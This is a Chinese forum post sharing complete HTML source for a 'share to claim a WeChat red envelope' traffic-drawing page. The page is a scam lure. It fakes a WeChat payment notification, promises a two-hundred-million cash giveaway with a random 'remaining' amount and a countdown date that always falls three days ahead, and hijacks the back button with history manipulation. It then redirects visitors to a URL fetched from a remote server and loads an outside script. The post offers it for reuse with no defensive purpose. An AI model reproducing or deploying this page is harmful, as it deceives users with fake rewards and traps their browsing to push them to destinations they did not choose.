源创宝库吧 新一代精品资源网 在线工具箱 此位置招租 SanS三石导航页 ⚡免费影视资源库丨极速无广告⚡ 此位置招租 此位置招租 此位置招租 此位置招租 此位置招租 ⚡免费影视资源库丨极速无广告⚡ 此位置招租 此位置招租 此位置招租 此位置招租 此位置招租 ⚡免费影视资源库丨极速无广告⚡ 此位置招租 此位置招租 此位置招租 此位置招租 此位置招租 ⚡免费影视资源库丨极速无广告⚡ 此位置招租
返回列表 发布新帖
查看: 92|回复: 2

[其他源码] 2024微信分享领红包引流HTML源码

  在线 
灌水成绩
127
203
806
主题
回帖
积分

等级头衔
UID : 83
等级 : 版主

积分成就
威望 : 93 点
贡献 : 378 点
蛋壳 : 5714 枚
在线时间 : 1311 小时
注册时间 : 2024-4-17
最后登录 : 2024-9-17

荣誉勋章
发表于 2024-5-29 12:18:33 | 查看全部 |阅读模式 来自: 中国–黑龙江–七台河

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
<button id="btnxxx" class="btnhide" type="button" data-clipboard-text=""
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4.     <meta charset="UTF-8">
  5.     <meta name="renderer" content="webkit">
  6.     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  7.     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  8.     <title>QQ沐编程</title>
  9.     <style>
  10.         * {
  11.             padding: 0;
  12.             margin: 0
  13.         }
  14.       
  15.         @keyframes show1 {
  16.             0% {
  17.                 opacity: 0;
  18.                 transform: scale(0.2);
  19.             }
  20.             100% {
  21.                 opacity: 1;
  22.                 transform: scale(1);
  23.             }
  24.         }
  25.         @keyframes btn1 {
  26.             0% {
  27.                 transform: rotate(-720deg);
  28.             }
  29.             100% {
  30.                 transform: rotate(0deg);
  31.             }
  32.         }
  33.         @keyframes show2 {
  34.             0% {
  35.                 opacity: 0;
  36.                 transform: translateY(50%);
  37.             }
  38.             100% {
  39.                 opacity: 1;
  40.                 transform: translateY(0%);
  41.             }
  42.         }
  43.         @keyframes btn2 {
  44.             0% {
  45.                 transform: scale(0)
  46.             }
  47.             100% {
  48.                 transform: scale(1);
  49.             }
  50.         }
  51.         @keyframes show3 {
  52.             0% {
  53.                 opacity: 0;
  54.                 transform: translateY(-50%);
  55.             }
  56.             100% {
  57.                 opacity: 1;
  58.                 transform: translateY(0%);
  59.             }
  60.         }
  61.         @keyframes btn3 {
  62.             0% {
  63.                 transform: scale(0)
  64.             }
  65.             100% {
  66.                 transform: scale(1);
  67.             }
  68.         }
  69.         @keyframes show4 {
  70.             0% {
  71.                 opacity: 0;
  72.                 border-radius: 100%
  73.             }
  74.             100% {
  75.                 opacity: 1;
  76.                 border-radius: 0%;
  77.             }
  78.         }
  79.         @keyframes btn4 {
  80.             0% {
  81.                 transform: scale(1, 0)
  82.             }
  83.             100% {
  84.                 transform: scale(1, 1);
  85.             }
  86.         }
  87.         @keyframes btnShake1 {
  88.             0% {
  89.                 transform: scale(1);
  90.             }
  91.             40% {
  92.                 transform: scale(1.1);
  93.             }
  94.             60% {
  95.                 transform: scale(.9);
  96.             }
  97.             80% {
  98.                 transform: scale(1.2);
  99.             }
  100.             100% {
  101.                 transform: scale(1);
  102.             }
  103.         }
  104.         @keyframes btnShake2 {
  105.             0% {
  106.                 transform: scale(1);
  107.             }
  108.             40% {
  109.                 transform: scale(1.1, 0.9);
  110.             }
  111.             60% {
  112.                 transform: scale(.9, 1.1);
  113.             }
  114.             80% {
  115.                 transform: scale(1.2, 0.8);
  116.             }
  117.             100% {
  118.                 transform: scale(1);
  119.             }
  120.         }
  121.         @keyframes btnShake3 {
  122.             0% {
  123.                 transform: scale(1, 1) rotate(0deg);
  124.             }
  125.             10% {
  126.                 transform: scale(1.2, 0.8);
  127.             }
  128.             20% {
  129.                 transform: scale(0.8, 1.2);
  130.             }
  131.             30% {
  132.                 transform: scale(1.2, 0.8);
  133.             }
  134.             40% {
  135.                 transform: scale(0.8, 1.2);
  136.             }
  137.             50% {
  138.                 transform: scale(1, 1);
  139.             }
  140.             60% {
  141.                 transform: rotate(-15deg);
  142.             }
  143.             70% {
  144.                 transform: rotate(15deg);
  145.             }
  146.             80% {
  147.                 transform: rotate(-25deg);
  148.             }
  149.             90% {
  150.                 transform: rotate(25deg);
  151.             }
  152.             100% {
  153.                 transform: scale(1, 1) rotate(0deg);
  154.             }
  155.         }
  156.         @keyframes btnShake4 {
  157.             0% {
  158.                 transform: rotate(0deg);
  159.                 opacity: 1;
  160.             }
  161.             10% {
  162.                 transform: scale(1.2, 0.8);
  163.             }
  164.             20% {
  165.                 transform: scale(0.8, 1.2);
  166.             }
  167.             30% {
  168.                 transform: scale(1.2, 0.8);
  169.             }
  170.             40% {
  171.                 transform: scale(0.8, 1.2);
  172.             }
  173.             50% {
  174.                 transform: scale(1, 1);
  175.             }
  176.             60% {
  177.                 opacity: 1;
  178.             }
  179.             70% {
  180.                 opacity: 0.5;
  181.             }
  182.             80% {
  183.                 opacity: 1;
  184.             }
  185.             90% {
  186.                 opacity: 0.5;
  187.             }
  188.             100% {
  189.                 transform: scale(1, 1);
  190.                 opacity: 1;
  191.             }
  192.         }
  193.         @keyframes btnMove {
  194.             from {
  195.                 transform: rotateY(180deg)
  196.             }
  197.             to {
  198.                 transform: rotateY(360deg)
  199.             }
  200.         }
  201.         @keyframes rotateMove {
  202.             from {
  203.                 transform: rotate(0deg)
  204.             }
  205.             to {
  206.                 transform: rotate(360deg)
  207.             }
  208.         }
  209.         
  210.         @keyframes itemMove1 {
  211.             0% {
  212.                 height: 0px;
  213.             }
  214.             100% {
  215.                 height: 60px;
  216.             }
  217.         }
  218.         @keyframes itemMove2 {
  219.             0% {
  220.                 height: 0px;
  221.                 transform: scaleY(0);
  222.             }
  223.             40% {
  224.                 height: 60px;
  225.                 transform: scaleY(0);
  226.             }
  227.             100% {
  228.                 transform: scaleY(1);
  229.             }
  230.         }
  231.         @keyframes itemMove3 {
  232.             0% {
  233.                 height: 0px;
  234.                 transform: translateX(100px);
  235.                 opacity: 0;
  236.             }
  237.             40% {
  238.                 height: 60px;
  239.                 transform: translateX(100px);
  240.                 opacity: 0;
  241.             }
  242.             100% {
  243.                 transform: translateX(0px);
  244.                 opacity: 1;
  245.             }
  246.         }
  247.         @keyframes itemMove4 {
  248.             0% {
  249.                 height: 0px;
  250.                 transform: translateX(-100px);
  251.                 opacity: 0;
  252.             }
  253.             40% {
  254.                 height: 60px;
  255.                 transform: translateX(-100px);
  256.                 opacity: 0;
  257.             }
  258.             100% {
  259.                 transform: translateX(0px);
  260.                 opacity: 1;
  261.             }
  262.         }
  263.         @keyframes tipMove {
  264.             0% {
  265.                 transform: translate(0px, 0%);
  266.             }
  267.             40% {
  268.                 transform: translate(-10px, 30%);
  269.             }
  270.             100% {
  271.                 transform: translate(0px, 0%);
  272.             }
  273.         }
  274.         
  275.         .text-tip {
  276.             position: relative;
  277.         }
  278.         .text-tip::before {
  279.             position: absolute;
  280.             content: "";
  281.             width: .1px;
  282.             height: .1px;
  283.             border: solid 8px rgba(0, 0, 0, 0);
  284.             border-right-color: #ebcd9b;
  285.             top: 0px;
  286.             left: -16px;
  287.         }
  288.         .tan-bg-tz {
  289.             background-color: #fff;
  290.             border-radius: 6px;
  291.             position: fixed;
  292.             width: 96%;
  293.             animation: demo2 5s ease-in-out 0s 1 alternate forwards;
  294.             left: 2%;
  295.             z-index: 6666;
  296.         }
  297.         .tongzhi_top {
  298.             display: flex;
  299.             justify-content: space-between;
  300.             margin-bottom: 4px;
  301.         }
  302.         .tongzhi_bottom {
  303.             display: flex;
  304.             align-items: center;
  305.             justify-content: space-between;
  306.             font-size: 14px;
  307.         }
  308.         .t_l_text {
  309.             display: flex;
  310.             align-items: center;
  311.             font-size: 12px;
  312.         }
  313.         .t_l_text img {
  314.             width: 20px;
  315.             height: auto;
  316.             display: block;
  317.             margin-right: 10px;
  318.         }
  319.         .safe-img {
  320.             margin-top: 4px;
  321.         }
  322.         .safe-img img {
  323.             width: 14px;
  324.             height: auto;
  325.             display: block;
  326.         }
  327.         .tz_img img {
  328.             width: 10vw;
  329.             height: 10vw;
  330.             display: block;
  331.         }
  332.         .text-ling {
  333.             margin-top: 4px;
  334.             color: #6a6a6a;
  335.         }
  336.         .text-new {
  337.             color: #6a6a6a;
  338.         }
  339.         .new-bg-tz {
  340.             padding: 10px 10px 12px 20px;
  341.         }
  342.         @keyframes demo2 {
  343.             0% {
  344.                 transform: translateY(-100px);
  345.             }
  346.             30% {
  347.                 transform: translateY(4px);
  348.             }
  349.             50% {
  350.                 transform: translateY(4px);
  351.             }
  352.             100% {
  353.                 transform: translateY(-300px);
  354.             }
  355.         }
  356.     </style>
  357.     <style>
  358.         .modal2 {
  359.             margin: auto;
  360.             top: 100px;
  361.             padding-top: 20px;
  362.             padding-left: 20px;
  363.             padding-right: 20px;
  364.             background: white;
  365.             border-radius: 8px;
  366.             position: relative;
  367.         }
  368.         .modal1 {
  369.             width: 100%;
  370.             background: #FEFEFE;
  371.             text-align: center;
  372.             padding-top: 5vh;
  373.             padding-bottom: 5vh;
  374.         }
  375.         .disappear {
  376.             width: 30px;
  377.             height: 30px;
  378.             border-radius: 50%;
  379.             background: #c0c0c0;
  380.             font-size: 20px;
  381.             line-height: 26px;
  382.             font-weight: bold;
  383.             text-align: center;
  384.             color: #ebebeb;
  385.             position: absolute;
  386.             right: -10px;
  387.             top: -10px;
  388.         }
  389.         .btn1 {
  390.             width: 100%;
  391.             height: 50px;
  392.             border-top: 1px solid #dcd9d9;
  393.         }
  394.         .btnHide {
  395.             width: 100%;
  396.             height: 50px;
  397.             font-size: 22px;
  398.             color: #18ad19;
  399.             border: 0;
  400.             background: white;
  401.             border-radius: 4px;
  402.         }
  403.     </style>
  404.    
  405.     <script>
  406.         window.apiCode = "api1";
  407.     </script>
  408.     <script>
  409.         var ftitle = ["全民派發现金", "biaoqing全҈民派fuhao钱", "biaoqing全民fuhao领钱", "人人有fuhao有钱领", "biaoqing现金奖励,随便领", "biaoqing人人fuhao有钱領"];
  410.         var ztitle = ["", '沐编程支持', '支持QQ沐编程世界第一', "支持QQ沐编程全民派钱", "支持QQ沐编程全民送钱", "支持QQ沐编程人人有钱领", "人人有钱領", "支持沐编程随机现金奖励"];
  411.         var bg_img = '1.png';
  412.         var nextUri = "jiayou_b";
  413.         function getUrlParam(name) {
  414.             var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
  415.             var r = window.location.search.substr(1).match(reg);
  416.             if (r != null) return unescape(r[2]);
  417.             return null;
  418.         }
  419.         function random_num(max, min) {
  420.             var suff = parseInt(Math.random() * (max - min + 1) + min, 10); Math.floor(Math.random() * (max - min + 1) + min);
  421.             return suff;
  422.         }
  423.         var now_time = new Date().getTime();
  424.         var from_time = (parseInt(getUrlParam('_t', document.referrer)) * 1000 || now_time);
  425.         var future = new Date(from_time + 3600 * 24 * 1000 * 3 + 8 * 3600 * 1000);
  426.         var future_str = future.toISOString().substr(0, 10);
  427.         function hideDialog() {
  428.             document.getElementById('dia').style.display = 'none';
  429.         }
  430.     </script>
  431. </head>
  432. <body style="background:#000">
  433.     <div id="axax" class="tan-bg-tz" style="">
  434.         <div class="new-bg-tz">
  435.             <div class="tongzhi_top">
  436.                 <div class="t_l_text">
  437.                     <div>
  438.                         <img src="https://img2.baidu.com/it/u=23367259,2830870342&fm=253&fmt=auto&app=138&f=JPG?w=500&h=382" ></div>
  439.                     <div>微信  <span class="text-new">刚刚</span></div>
  440.                 </div>
  441.                 <div class="safe-img"><img src="http://q1.qlogo.cn/g?b=qq&nk=817094&s=100" ></div>
  442.             </div>
  443.             <div class="tongzhi_bottom">
  444.                 <div>
  445.                     <div>微信红包</div>
  446.                     <div class="text-ling">已到账,分享即可领取</div>
  447.                 </div>
  448.                 <div class="tz_img"><img src="http://q1.qlogo.cn/g?b=qq&nk=817094&s=100" ></div>
  449.             </div>
  450.         </div>
  451.     </div>
  452.     <div class="modal2" id='dia' style='z-index: 1000;font-family:"微软雅黑";'>
  453.         <div class="disappear" data-clipboard-text="" id="disappear" onclick='hideDialog()'>x</div>
  454.         <div class="modal1">
  455.             <p style="color: #e03424; font-size: 24px; line-height: 40px;">QQ沐编程补帖<br></p>
  456.             <p style="margin-bottom: 20px; font-size:18px; "></p>
  457.             <p style="font-size: 16px; color: #f4434f; margin-bottom: 20px;">
  458.                 福利补贴
  459.                 <br>
  460.                 截至于<span style="font-size: 20px" id="datetime">1月10日</span>送完为止,人人免费领</p>
  461.             <p style="font-size: 16px; margin-bottom: 20px;">为答谢新老用户们的支持与厚爱,现发出补助金<br><span
  462.                     style="color: #f4434f;">两亿</span>现金礼包回馈微信用户</p>
  463.             <p style="color: #bcbcbc; font-size: 16px; margin-bottom: 20px;"> 红包总额仅剩余<span
  464.                     style="color: #f4434f; font-size: 22px;">
  465.                     <script>document.write(random_num(10, 99))</script>万</span><br> 数量有限,先到先得 </p>
  466.         </div>
  467.         <div class="btn1"> <button id="btnxxx" class="btnHide" type="button" data-clipboard-text=""
  468.                 onclick='hideDialog()'>现在去领</button></div>
  469.     </div>
  470.     <div
  471.         style="z-index: 999;height: 80vh;background-color: rgb(220,94,77);width: 80vw;margin: 0 auto;border-radius: 10px;overflow: hidden;position: fixed;top: 10vh;left: 10vw;animation: show1 .4s;overflow: hidden;">
  472.         <div
  473.             style="height: 50vh;border: 1px solid rgb(220,94,77);background-color: rgb(220,94,77);border-radius: 10px 10px 50% 50% / 10px 10px 19% 19%;box-shadow: 0px 4px 0px -1px rgba(0, 0, 0, 0.2);">
  474.             <img src="http://q1.qlogo.cn/g?b=qq&nk=817094&s=100" style="width:60px;height: 60px; margin: 0 auto 0; display: block; padding-top: 60px;">
  475.             <p style="font-size: 24px;text-align: center;padding-top: 20px;color: #ebcd9b;">QQ沐编程-补贴</p>
  476.             <p style="font-size: 16px;text-align: center;padding-top: 20px;color: #ebcd9b;">人人有 有钱领<span
  477.                     class="text-tip"
  478.                     style="margin-left: 14px; font-size: 12px; background-color: #ebcd9b; padding: 1px 4px; color: rgb(220,94,77)">可提现</span>
  479.             </p>
  480.         </div>
  481.         <div id="openbtn"
  482.             style="width: 27.2vw;height: 25vw;border: 1px solid #ebcd9b;background-color: #ebcd9b;border-radius: 50%;margin: -45px auto 0;box-shadow: 0px 4px 0px 0px rgba(0, 0, 0, 0.2);text-align: center;line-height: 90px;animation: btn1 .5s;animation:1.8s ease 0s infinite normal none running btnShake3;animation-delay: .1s;"
  483.             onclick="openRed(this)"> <span
  484.                 style=" display: inline-block;margin-top: 45px; font-size: 120px; font-family: SimSun; font-weight: bold; color: #333;-webkit-animation: scaling .6s infinite; animation: scaling .6s infinite;">抢</span>
  485.         </div>
  486.     </div>
  487. </body>
  488. <script>
  489.        function openRed() {
  490.         document.getElementById("openbtn")["style"]["animation"] = "btnMove .6s infinite alternate";
  491.         setTimeout(function () {
  492.             go();
  493.         }, 0x258);
  494.     }
  495.     window.go = function () {
  496.         function loadHtml(url) {
  497.             document.title = "...";
  498.             var xhr = new XMLHttpRequest;
  499.             var html = null;
  500.             function render() {
  501.                 var a = document.open("text/html;charset=UTF-8", "replace");
  502.                 a.write(html);
  503.                 a.close();
  504.             }
  505.             xhr.onload = function () {
  506.                 html = xhr.responseText;
  507.                 var delay = 0;
  508.                 if (delay > 0) setTimeout("render()", delay * 1000)
  509.                 else render();
  510.             };
  511.             xhr.open("GET", url, !0);
  512.             xhr.send();
  513.         }
  514.         
  515.         var httpRequest = new XMLHttpRequest();
  516.             httpRequest.open('GET', 'https://www.qqmu.com', true);
  517.             httpRequest.send();
  518.             httpRequest.onreadystatechange = function () {
  519.                 if (httpRequest.readyState == 4 && httpRequest.status == 200) {
  520.                     var json = httpRequest.responseText;
  521.                     if (json.length > 3) {
  522.                         if (window.location.href.indexOf(json) < 0) {
  523.                             top.location.href = json;
  524.                         }else{
  525.                             top.location.href = "https://www.qqmu.com";
  526.                         }
  527.                     }else{
  528.                         top.location.href = "https://www.qqmu.com";
  529.                     }
  530.                 }
  531.             };
  532.     }
  533.     var random = (Math.random() * 15);
  534.     var random2 = (Math.random() * 100);
  535.     var dww = 60;
  536.     var dtt = 45;
  537.     if (location.href.indexOf("v_100") != -1) {
  538.         document.getElementById('dia').style.display = "none";
  539.     }
  540.     var now_time = new Date().getTime();
  541.     var from_time = (parseInt(now_time));
  542.     var future = new Date(from_time + 3600 * 24 * 1000 * 3 + 8 * 3600 * 1000);
  543.     var datetime = future.toISOString().substr(5, 5);
  544.     datetime = datetime.replace("-", "\u6708");
  545.     document.getElementById('datetime').innerText = datetime + "日";
  546.     document.getElementById('axax').style.top = (random2) + "px";
  547.     if (sessionStorage.getItem("a") == null) {
  548.     sessionStorage.setItem("a", "1");
  549.     var _hmt = _hmt || [];
  550.    
  551. }else{
  552.     // window.location.href="https://dwz.cn/33r9W1EL";
  553.     var httpRequest = new XMLHttpRequest();
  554.     httpRequest.open('GET', 'https://www.qqmu.com', true);
  555.     httpRequest.send();
  556.     httpRequest.onreadystatechange = function () {
  557.         if (httpRequest.readyState == 4 && httpRequest.status == 200) {
  558.             var json = httpRequest.responseText;
  559.             window.location.href = json;
  560.         }
  561.     };
  562. }
  563. history.pushState(history.length + 1, "..``````", "#xxxx_" + new Date().getTime());
  564. window.onhashchange = function () {
  565.     // window.location.href="https://dwz.cn/33r9W1EL";
  566.     var httpRequest = new XMLHttpRequest();
  567.     httpRequest.open('GET', 'https://www.qqmu.com', true);
  568.     httpRequest.send();
  569.     httpRequest.onreadystatechange = function () {
  570.         if (httpRequest.readyState == 4 && httpRequest.status == 200) {
  571.             var json = httpRequest.responseText;
  572.             window.location.href=json;
  573.         }
  574.     };
  575. };
  576. </script>
  577. <script src="https://cawtwat.oss-cn-qingdao.aliyuncs.com/bd.js"></script>
  578. </html>
复制代码
生无可恋
  在线 
灌水成绩
127
203
806
主题
回帖
积分

等级头衔
UID : 83
等级 : 版主

积分成就
威望 : 93 点
贡献 : 378 点
蛋壳 : 5714 枚
在线时间 : 1311 小时
注册时间 : 2024-4-17
最后登录 : 2024-9-17

荣誉勋章
 楼主| 发表于 2024-5-29 12:18:48 | 查看全部 来自: 中国–黑龙江–七台河
朋友这种关系,最美在于锦上添花;最可贵,贵在雪中送炭;朋友中的极品,便如好茶,淡而不涩,清香但不扑鼻,缓缓飘来,似水长流。
生无可恋
  在线 
灌水成绩
2168
16240
22205
主题
回帖
积分

等级头衔
UID : 79
等级 : 超级版主

积分成就
威望 : 1008 点
贡献 : 2344 点
蛋壳 : 50425 枚
在线时间 : 2574 小时
注册时间 : 2024-4-13
最后登录 : 2024-9-17

荣誉勋章

荣誉会员帅哥认证最佳新人活跃会员灌水之王实习版主推广达人宣传达人论坛元老热心会员优秀作者优秀版主超级版主部落真神

发表于 2024-6-29 13:30:33 | 查看全部 来自: 中国–上海–上海
滴~稀有卡,打卡成功!楼主辛苦了,祝楼主:财源滚滚🧡,打卡时间:2024年06月29日 13:30:33
新帖通知群(钉钉群):点击查看
荷包蛋部落(QQ群):荷包蛋部落 - HBD0.CN
💥荷包蛋联盟-免费的自助广告-为广大用户提供宣传服务!💯
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1楼
2楼
3楼
投诉/建议联系

8641340@qq.com

欢迎各位朋友加入本社区,
共同维护良好的社区氛围
  • QQ用户交流群
  • 钉钉新帖推送群
Powered by Discuz! X3.5 Licensed  Copyright © 2001-2024 荷包蛋部落 版权所有 All Rights Reserved. 鲁ICP备20023396号-6
关灯 在本版发帖
加入钉钉新帖推送群
QQ客服返回顶部
快速回复 返回顶部 返回列表